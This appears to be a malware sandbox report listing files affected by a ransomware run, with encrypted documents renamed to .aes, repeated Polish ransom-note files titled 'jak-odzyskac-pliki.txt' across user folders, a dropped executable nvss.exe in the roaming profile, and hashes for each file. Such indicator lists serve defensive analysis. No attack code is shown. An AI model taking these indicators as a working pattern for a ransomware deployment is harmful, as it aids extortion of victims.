users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods.aes users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods.aes aes MD5 add50a9d4fe1bbf810bc937bfdcbd5a2 SHA1 8e65889419c460fd1053a175bd6cb4ac2926d30c SHA256 a0d78a02b9120cd272466d4abe2b6cf3eac07fce75124c69d44b767bf9b7889e File users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv.aes users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv.aes aes MD5 c32036dd886239d37943c07ba0162421 SHA1 e3762ea1a5d3175a86be28e4701178f14286815f SHA256 12a6bfd65442d5a6dea0eb07df54c271530d9cacd50ca2c5d488f12bdc0b0137 File users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt.aes users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt.aes aes MD5 6a14d50c775b23919f576eb8ccd008b5 SHA1 702ff432d5b62281f50f3b17cecd679caae3278f SHA256 4786addec83d6e65d1d11d613d89e1d1f8a5c2bd394bcc3ad9283915bcab8059 File users\kft6utqw\documents\31c8jf9y_xli.docx.aes users\kft6utqw\documents\31c8jf9y_xli.docx.aes c:\ c:\users\kft6utqw\documents\31c8jf9y_xli.docx.aes aes MD5 f4141b893956c5fcaa6b6f5657bdf728 SHA1 4deb4e031cbcffb0db883c470281ad096a2ef6b0 SHA256 701a94fdfff7ee232bec3f9fdf7082d9f9936f193abf9c67eb083c85db255abd File users\kft6utqw\documents\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\#$# jak-odzyskac-pliki.txt txt MD5 8c73ebb6192923bd0767d3e8e5eaa3ba SHA1 0d71f61d9c8ccad698a30eb2908b921b1b14596f SHA256 bb77c9af9c798eb1a2a18bd21b70ea100c20530f4de7ca2370e64bc0f4267e4f File users\kft6utqw\documents\4mqnx-qcbrpg7.docx.aes users\kft6utqw\documents\4mqnx-qcbrpg7.docx.aes c:\ c:\users\kft6utqw\documents\4mqnx-qcbrpg7.docx.aes aes MD5 68f7c6e9369b2fa7185fc46e6264cf62 SHA1 6d1dba81e71cb6803388eb92533786f337b63234 SHA256 3ecaf96c0f29ebb5688ce497f0d63ba88bcfcd8abfff76ddb2f2cf6d66c4c1d0 File users\kft6utqw\documents\aonimexn t.xlsx.aes users\kft6utqw\documents\aonimexn t.xlsx.aes c:\ c:\users\kft6utqw\documents\aonimexn t.xlsx.aes aes MD5 6337e686c637acdb910f80da94d869b1 SHA1 b36bbde406ae72f2c78467800a609095dcc89e07 SHA256 6324ebb54dc1022d62d93931e6327dff103e4951f7a0f84a02d68b90f59c7850 File users\kft6utqw\documents\bcatcic fci96kikr19.pptx.aes users\kft6utqw\documents\bcatcic fci96kikr19.pptx.aes c:\ c:\users\kft6utqw\documents\bcatcic fci96kikr19.pptx.aes aes MD5 aeeee30c5b77d154e1423af81dca3076 SHA1 afb08ed85991523a3f618133db01c401f6dba5f6 SHA256 b636ce4e26604c5c79691ea2168de1c7c95b39f613feadedf5d39f1e74871c36 File users\kft6utqw\documents\bdvwr.doc.aes users\kft6utqw\documents\bdvwr.doc.aes c:\ c:\users\kft6utqw\documents\bdvwr.doc.aes aes MD5 1f9c6027cd30ae2e2cafc82f218b8ed0 SHA1 7214cb54b3648d66efd5e1a2a0af95975182d7b7 SHA256 87d16ba0e6edc1bb891c79ac7d9a3e65cd1bdd4d09a6061be3282aa532a6f5c3 File users\kft6utqw\documents\d-4thvumdh.csv.aes users\kft6utqw\documents\d-4thvumdh.csv.aes c:\ c:\users\kft6utqw\documents\d-4thvumdh.csv.aes aes MD5 6e238555ba20055a197fc06cae44d052 SHA1 a2708ecf3b0dad7eb50900a8ef632c3b2c19bbeb SHA256 832a5693695b7fc95556d4a45f1cb062a1369ce5addaee64920e10b4aed4e465 File users\kft6utqw\documents\ev0ylmk5921.pptx.aes users\kft6utqw\documents\ev0ylmk5921.pptx.aes c:\ c:\users\kft6utqw\documents\ev0ylmk5921.pptx.aes aes MD5 7e8911b50f352ff4575046afe9dfe30f SHA1 4bae349c4c78751a39726411c591af439dc9ce6f SHA256 4051677f29f7ec50a8f34a4c6c25132f2d53fed58c0dd7b0a7b483d0af0cf49b File users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx.aes users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx.aes c:\ c:\users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx.aes aes MD5 39cd60a5cccc800a9a3ca9aee965d469 SHA1 60a5945c047bacc4bc53eb314f296828e37d05c9 SHA256 3112ec6461a1bfbeb9c7d294be6e83bd11627f7933d8b059a0e594d3363261a3 File users\kft6utqw\documents\gxfwksunytgfj.pptx.aes users\kft6utqw\documents\gxfwksunytgfj.pptx.aes c:\ c:\users\kft6utqw\documents\gxfwksunytgfj.pptx.aes aes MD5 043ba7ac688249dd26003e85ccdc0b84 SHA1 b7b5bb27edb9a11bcb7b53bef291a0eb442102d9 SHA256 864d89e06f543e6e0eb75c454d825bbfb2bab8c80aa506275f388c2e973e3d6a File users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx.aes users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx.aes c:\ c:\users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx.aes aes MD5 f84fe8b88700cafc4ff65e6298d5a1ef SHA1 cda97cd47f344c4ce39926392f9c548b957e2b82 SHA256 aa41569f77a436824375431b555c936e3db6dbbe649c8ec12d2935a1d3519a4d File users\kft6utqw\documents\lcptyhqe.xlsx.aes users\kft6utqw\documents\lcptyhqe.xlsx.aes c:\ c:\users\kft6utqw\documents\lcptyhqe.xlsx.aes aes MD5 ad2026da18a6b90512a138ba1eb63480 SHA1 381041bc4e94295c38ca1357fc6e205acab7192b SHA256 0d70b1d2ef594a2b81fafcdc134f86efee925230d0d36d0a0d2f2a02d5368e59 File users\kft6utqw\documents\u5x9.ppt.aes users\kft6utqw\documents\u5x9.ppt.aes c:\ c:\users\kft6utqw\documents\u5x9.ppt.aes aes MD5 cd6547e82546369d205f3c01ea5abbc0 SHA1 4130f2ee7457f5be0424affcc2b3708d256fdb00 SHA256 1cf5460dba6cfe5cba25fcb560b705964b94cb3a6c2b198d7a6ece21be011e5e File users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx.aes users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx.aes c:\ c:\users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx.aes aes MD5 1adb40e44060aba93c76a3109e110d1c SHA1 db5ddc160bf842f336f418e21371346a3f09fc3b SHA256 70f279cda13e70219f3d73933b90f5c8961db23b00fd003a7bf7f38cad1b1a39 File users\kft6utqw\documents\zb6u3g7h.xlsx.aes users\kft6utqw\documents\zb6u3g7h.xlsx.aes c:\ c:\users\kft6utqw\documents\zb6u3g7h.xlsx.aes aes MD5 42d603d0f87c590def22ae3f8564d81f SHA1 26771d40be67fcd75deb178cb9ded7eb83ec7fc7 SHA256 49e717e750ac3e95199a8a887f47feaf0dbd8aec66f394e9105fde8b40f2e658 File users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\#$# jak-odzyskac-pliki.txt txt MD5 69acb08ae8248c29e285c9963fb7079f SHA1 9e8b264a6cd08d7e34dba0ee314ba034fbe0583b SHA256 4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe File users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\#$# jak-odzyskac-pliki.txt txt MD5 69acb08ae8248c29e285c9963fb7079f SHA1 9e8b264a6cd08d7e34dba0ee314ba034fbe0583b SHA256 4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe File users\kft6utqw\pictures\e8b06t5z\joddd\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\joddd\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\#$# jak-odzyskac-pliki.txt txt MD5 a62a3583cdce1e80ddf7213b9f0cf77e SHA1 4fdc86cd4eaea06740c79d019791429deefebb68 SHA256 35f91180f40bf66f2d652a57b0e47939e2bcdd5bbf6303cd36f04b5014c5a9c0 File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\#$# jak-odzyskac-pliki.txt txt MD5 8320e6f45dadffeec167aeee53609ddd SHA1 198068b05a66d806fd08af8eb9488821c360b93c SHA256 c9038eb0fa2705d6c7c6500f9514f8905b0f787dcb549b0810e45c993f2bab6c File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\#$# jak-odzyskac-pliki.txt txt MD5 74c1a1938a4d9ab8d168acc8a181d601 SHA1 6cbc228c55739bf871256f3a4223ee060f8ddf80 SHA256 1213dc777fe40c479bd05d88224cff59e4be0682fe19512d1198f3bc71f3459a File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\#$# jak-odzyskac-pliki.txt txt MD5 568ee3a769c9fea2d890bb6bc23c43fd SHA1 24ee2b9ae39e68a8db7d433d2b28dae8e8bf7ef8 SHA256 823d99ece7193051415cd84e5417f72858a43a0499f061ebd366ecf3eec37758 File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\#$# jak-odzyskac-pliki.txt txt MD5 e17f25a09167186cbeb09ae377389eb2 SHA1 b9f29decd8fdbe5aeb45da2133995c8ddf018b6e SHA256 1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c File users\kft6utqw\pictures\e8b06t5z\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\e8b06t5z\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\e8b06t5z\#$# jak-odzyskac-pliki.txt txt MD5 e17f25a09167186cbeb09ae377389eb2 SHA1 b9f29decd8fdbe5aeb45da2133995c8ddf018b6e SHA256 1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c File users\kft6utqw\pictures\#$# jak-odzyskac-pliki.txt users\kft6utqw\pictures\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\pictures\#$# jak-odzyskac-pliki.txt txt MD5 61702ec4ed58e11e5017a00eb72c6b2f SHA1 7309d13f144e5ff6eb79a0149b8cc52249328d5a SHA256 1f7d1c2f78b2fe7142a835ccfbd7cdb33658c40c3ef00d7aa149a6d2d3b6687d File users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\#$# jak-odzyskac-pliki.txt txt MD5 f78df3ccf69363318da2b79f73275f6e SHA1 41c9649c71bb5259f57663a682dfd41ab8c8819d SHA256 0ac260de49443f32b63b2baca13f5cf18f879883dbbd93ebed6d03dbf1bff09b File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\#$# jak-odzyskac-pliki.txt txt MD5 386d8d06597b757afa311c47c3aa4b82 SHA1 0b3b2414c455dc89776cca1b7fe73556ccb55c3f SHA256 3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839 File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\#$# jak-odzyskac-pliki.txt txt MD5 386d8d06597b757afa311c47c3aa4b82 SHA1 0b3b2414c455dc89776cca1b7fe73556ccb55c3f SHA256 3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839 File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\#$# jak-odzyskac-pliki.txt txt MD5 7f3ac020ebd789a44fe7f9054a8d2c78 SHA1 61416220fae7e3b98897ca7d9c31a7bdba43ced9 SHA256 e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1 File users\kft6utqw\music\e1mt woaqipijv7ecvn\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\e1mt woaqipijv7ecvn\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\#$# jak-odzyskac-pliki.txt txt MD5 7f3ac020ebd789a44fe7f9054a8d2c78 SHA1 61416220fae7e3b98897ca7d9c31a7bdba43ced9 SHA256 e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1 File users\kft6utqw\music\#$# jak-odzyskac-pliki.txt users\kft6utqw\music\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\music\#$# jak-odzyskac-pliki.txt txt MD5 7f292a9240dcc5e82bac4a9d88b3b5a6 SHA1 fc0bf85fcfd24410fbfbfb350a6764c1cdac295c SHA256 d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\#$# jak-odzyskac-pliki.txt txt MD5 7f292a9240dcc5e82bac4a9d88b3b5a6 SHA1 fc0bf85fcfd24410fbfbfb350a6764c1cdac295c SHA256 d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\#$# jak-odzyskac-pliki.txt txt MD5 7f292a9240dcc5e82bac4a9d88b3b5a6 SHA1 fc0bf85fcfd24410fbfbfb350a6764c1cdac295c SHA256 d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\#$# jak-odzyskac-pliki.txt txt MD5 053b945285739893c800d9aec5eb49ad SHA1 bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7 SHA256 d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\#$# jak-odzyskac-pliki.txt txt MD5 053b945285739893c800d9aec5eb49ad SHA1 bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7 SHA256 d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b File users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\#$# jak-odzyskac-pliki.txt txt MD5 dcdeefee3471d9f83de438345adaf690 SHA1 50100ca304709d1100f77e998c26dabdb60d21d2 SHA256 f2152c6eae06767063cfe7d5d8d30e3ebfefef59b4d4c29a2d1a749f01f38d54 File users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\#$# jak-odzyskac-pliki.txt txt MD5 6f071e286fb00941bb763dcf065a2b03 SHA1 e39ec167a2ae272277bd74eee84e3908c3cc60b3 SHA256 c06dea51ced62ad71648fb18782665920e285472ca578256236d31eed785795e File users\kft6utqw\videos\extoa\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\extoa\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\extoa\#$# jak-odzyskac-pliki.txt txt MD5 e0eccdf604f1efd4682a51b796e9ef62 SHA1 4d09e0dd3bf3a06f104be9dc5b55b3751498c2a3 SHA256 a05219897c20d9b0e5c51af362fbbbcd8b1673aa6db26b735a1eee193327a99d File users\kft6utqw\videos\#$# jak-odzyskac-pliki.txt users\kft6utqw\videos\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\videos\#$# jak-odzyskac-pliki.txt txt MD5 b78f205248971f2d1ff730768e63e5e2 SHA1 35269e157a6cc2e2bb959f2b4d3521f56ebd4798 SHA256 b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb File users\kft6utqw\desktop\1zxeg6xm\cnh\#$# jak-odzyskac-pliki.txt users\kft6utqw\desktop\1zxeg6xm\cnh\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\desktop\1zxeg6xm\cnh\#$# jak-odzyskac-pliki.txt txt MD5 b78f205248971f2d1ff730768e63e5e2 SHA1 35269e157a6cc2e2bb959f2b4d3521f56ebd4798 SHA256 b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb File users\kft6utqw\appdata\roaming\nvss.exe users\kft6utqw\appdata\roaming\nvss.exe c:\ c:\users\kft6utqw\appdata\roaming\nvss.exe exe File windows\microsoft.net\framework\v4.0.30319\config\machine.config windows\microsoft.net\framework\v4.0.30319\config\machine.config c:\ c:\windows\microsoft.net\framework\v4.0.30319\config\machine.config config File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt odt File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv csv File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc doc File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp odp File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc doc File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf rtf File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods ods File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv csv File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf pdf File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf rtf File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf rtf File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx pptx File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls xls File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf pdf File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots ots File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt odt File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx docx File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx pptx File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls xls File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf rtf File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc doc File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx pptx File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps pps File users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt odt File users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods c:\ c:\users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods ods File users\kft6utqw\documents\6_uymfikkpct\eqov.odp users\kft6utqw\documents\6_uymfikkpct\eqov.odp c:\ c:\users\kft6utqw\documents\6_uymfikkpct\eqov.odp odp File users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt odt File users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx c:\ c:\users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx xlsx File users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc c:\ c:\users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc doc File 